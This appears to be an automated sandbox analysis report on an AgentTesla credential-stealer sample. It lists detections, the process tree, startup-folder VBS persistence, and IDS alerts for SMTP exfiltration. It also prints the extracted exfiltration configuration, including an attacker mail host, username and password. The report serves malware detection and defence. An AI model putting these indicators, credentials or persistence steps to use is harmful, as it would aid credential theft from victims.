Windows Analysis Report
Ref#20203216.exe

Overview

General Information

Sample name: Ref#20203216.exe
Analysis ID: 1579787
MD5: 9f9df5620e05da5bbf797b8531da35ab
SHA1: 22be3755c61f577fb39e4d71df0f8d9bfb90aa87
SHA256: e97247599a336032a86ea5cb42b3b9c971567977e245b689d87c3f2ef3d200e4
Tags: booking, exe, SPAM-ITA, user-JAMESWT_MHT

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#20203216.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\Ref#20203216.exe" MD5: 9F9DF5620E05DA5BBF797B8531DA35AB)
    • Ref#20203216.exe (PID: 2120 cmdline: "C:\Users\user\Desktop\Ref#20203216.exe" MD5: 9F9DF5620E05DA5BBF797B8531DA35AB)
  • wscript.exe (PID: 6704 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • iulue.exe (PID: 3264 cmdline: "C:\Users\user\AppData\Roaming\iulue.exe" MD5: 9F9DF5620E05DA5BBF797B8531DA35AB)
      • iulue.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Roaming\iulue.exe" MD5: 9F9DF5620E05DA5BBF797B8531DA35AB)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000001.00000002.2955905751.0000000002D04000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Ref#20203216.exe.6da0000.9.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.Ref#20203216.exe.41014f0.2.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.Ref#20203216.exe.41014f0.2.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.Ref#20203216.exe.41014f0.2.raw.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x96b63:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x96bd5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x96c5f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x96cf1:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x96d5b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x96dcd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x96e63:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x96ef3:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.iulue.exe.3a2fd10.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , ProcessId: 6704, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Ref#20203216.exe, Initiated: true, ProcessId: 2120, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , ProcessId: 6704, ProcessName: wscript.exe

                      Data Obfuscation

                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#20203216.exe, ProcessId: 6776, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-12-23T09:08:46.577495+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP
                      2024-12-23T09:08:46.577495+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 162.254.34.31 | 587 | TCP
                      2024-12-23T09:08:59.228245+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP
                      2024-12-23T09:09:15.923427+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 162.254.34.31 | 587 | TCP
                      2024-12-23T09:08:59.228245+0100 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP
                      2024-12-23T09:09:15.923427+0100 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 162.254.34.31 | 587 | TCP
                      2024-12-23T09:08:46.577495+0100 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP
                      2024-12-23T09:08:46.577495+0100 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 162.254.34.31 | 587 | TCP

                      AV Detection

                      Source: 4.2.iulue.exe.3a2fd10.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Source: C:\Users\user\AppData\Roaming\iulue.exe, ReversingLabs: Detection: 36%
                      Source: Ref#20203216.exe, Virustotal: Detection: 47%
                      Source: Ref#20203216.exe, ReversingLabs: Detection: 36%
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\iulue.exe, Joe Sandbox ML: detected
                      Source: Ref#20203216.exe, Joe Sandbox ML: detected
                      Source: Ref#20203216.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                      Source: Ref#20203216.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

                      Networking

                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49744 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49744 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49744 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /nvgU HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: oshi.at
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://ocsps.ssl.com0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://ocsps.ssl.com0?
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://ocsps.ssl.com0_
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/nvgU
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1756518799.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.0000000002AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: https://www.ssl.com/repository0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, SKTzxzsJw.cs.Net Code: nUAqbab

                      System Summary

                      Source: 0.2.Ref#20203216.exe.41014f0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                      Source: 4.2.iulue.exe.3a2fd10.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                      Source: 7.2.iulue.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                      Source: 4.2.iulue.exe.3a2fd10.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: Ref#20203216.exe Static PE information: invalid certificate
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.0000000003149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000032E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000000.1692835291.0000000000E32000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameref.exe8 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameref.exe8 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1777674923.0000000006A90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameKuzgfndqd.dll" vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1755703275.000000000130E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1782387192.0000000006F10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameref.exe8 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000001.00000002.2953338512.0000000000D39000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000001.00000002.2953533157.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Ref#20203216.exe
                      Source: Ref#20203216.exe Binary or memory string: OriginalFilenameref.exe8 vs Ref#20203216.exe
                      Source: Ref#20203216.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Ref#20203216.exe.41014f0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.iulue.exe.3a2fd10.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.iulue.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.iulue.exe.3a2fd10.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
